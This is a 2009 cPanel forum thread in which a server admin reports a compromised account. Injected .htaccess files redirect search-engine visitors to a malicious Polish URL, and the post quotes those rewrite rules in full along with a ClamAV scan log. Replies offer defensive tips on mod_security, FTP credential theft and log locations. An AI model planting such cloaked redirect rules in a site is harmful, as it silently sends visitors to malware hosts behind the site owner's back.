The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

.htaccess uploaded automatically

Discussion in 'General Discussion' started by crazyaboutlinux, Apr 6, 2009.

  1. crazyaboutlinux

    crazyaboutlinux Well-Known Member

    Joined:
    Nov 3, 2007
    Messages:
    938
    Likes Received:
    0
    Trophy Points:
    16
    hope some one at cPanel forum can short out this issue

    www.mydomain.com if you run directly in the browser it will load fine but

    search this domain into google then click on the result page this website will redirect to suspicious site e.g bizaz.bij.pl/pop1/go.php?sid=1

    since last 15 days i had lots of research in google to fix this issue but couldn't found any solutions

    finally i scanned this website in clamAV & found worm.redirect in .htaccess file

    file should be look like below
    RewriteEngine On
    RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*ya.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
    RewriteRule .* bizaz.bij.pl/pop1/go.php?sid=1 [R,L]

    Note: do not click on above link

    scanned log :

    /home/sunil/tmp/.htaccess: Worm.Redirect-1 FOUND
    /home/sunil/.cpanel/.htaccess: Worm.Redirect-1 FOUND
    /home/sunil/public_ftp/.htaccess: Worm.Redirect-1 FOUND
    /home/sunil/.htaccess: Worm.Redirect-1 FOUND
    /home/sunil/.neomail/.htaccess: Worm.Redirect-1 FOUND
    /home/sunil/.autorespond/.htaccess: Worm.Redirect-1 FOUND
    /home/sunil/cpmove.psql.1215962606/.htaccess: Worm.Redirect-1 FOUND
    /home/sunil/logs/.htaccess: Worm.Redirect-1 FOUND
    /home/sunil/public_html/.htaccess: Worm.Redirect-1 FOUND


    so my question is how to stop this kind of activities on server

    also i want log for this user sunil

    i wanted to know who did this

    how can i get log for the same.

    Nilesh
     
    #1 crazyaboutlinux, Apr 6, 2009
    Last edited by a moderator: Apr 6, 2009
  2. Infopro

    Infopro cPanel Sr. Product Evangelist
    Staff Member

    Joined:
    May 20, 2003
    Messages:
    14,460
    Likes Received:
    195
    Trophy Points:
    63
    Location:
    Pennsylvania
    cPanel Access Level:
    Root Administrator
    Twitter:
    In another thread started by you, you asked about Iframe attacks and I provided you with several links to the longest threads on this topic.

    I still believe your answers are there. They are long threads but there should be enough Info to get you going in the right direction.

    You need to read up on it to find the answers. As others have had to do, faced with the same problem you have here.
     
  3. nichiyume

    nichiyume Member

    Joined:
    Nov 18, 2004
    Messages:
    18
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Phoenix, Az
    mod_security would help. Build it with EasyApache and use at least the default rules available in the modsecurity link in WHM.
     
  4. crazyaboutlinux

    crazyaboutlinux Well-Known Member

    Joined:
    Nov 3, 2007
    Messages:
    938
    Likes Received:
    0
    Trophy Points:
    16


    mod_security is enabled & running with default rules as available in WHM


    Nilesh
     
  5. crazyaboutlinux

    crazyaboutlinux Well-Known Member

    Joined:
    Nov 3, 2007
    Messages:
    938
    Likes Received:
    0
    Trophy Points:
    16



    Hi Infopro

    This thread isn't related to iframe
     
  6. yapluka

    yapluka Well-Known Member

    Joined:
    Dec 24, 2003
    Messages:
    301
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    France
    cPanel Access Level:
    Root Administrator
    But the modus operandi might be the same. Did you search how those .htaccess were uploaded ?
    I would take a guess that they were uploaded through ftp. In this case, the owner of the account (and any other person having a ftp access) should thoroughly scan his computer with a good antivirus. Chances are at least one machine is infected with a keylogger or trojan.

    Best of luck :)
     
  7. crazyaboutlinux

    crazyaboutlinux Well-Known Member

    Joined:
    Nov 3, 2007
    Messages:
    938
    Likes Received:
    0
    Trophy Points:
    16
    i think this has been done by attackers so first i changed FTP p/w for the same

    but still i wanted to know who did this from where can i get ftp log for the same.
     
  8. yapluka

    yapluka Well-Known Member

    Joined:
    Dec 24, 2003
    Messages:
    301
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    France
    cPanel Access Level:
    Root Administrator
    /var/log/messages
     
  9. crazyaboutlinux

    crazyaboutlinux Well-Known Member

    Joined:
    Nov 3, 2007
    Messages:
    938
    Likes Received:
    0
    Trophy Points:
    16
    pls help for complete command
     
Loading...

Share This Page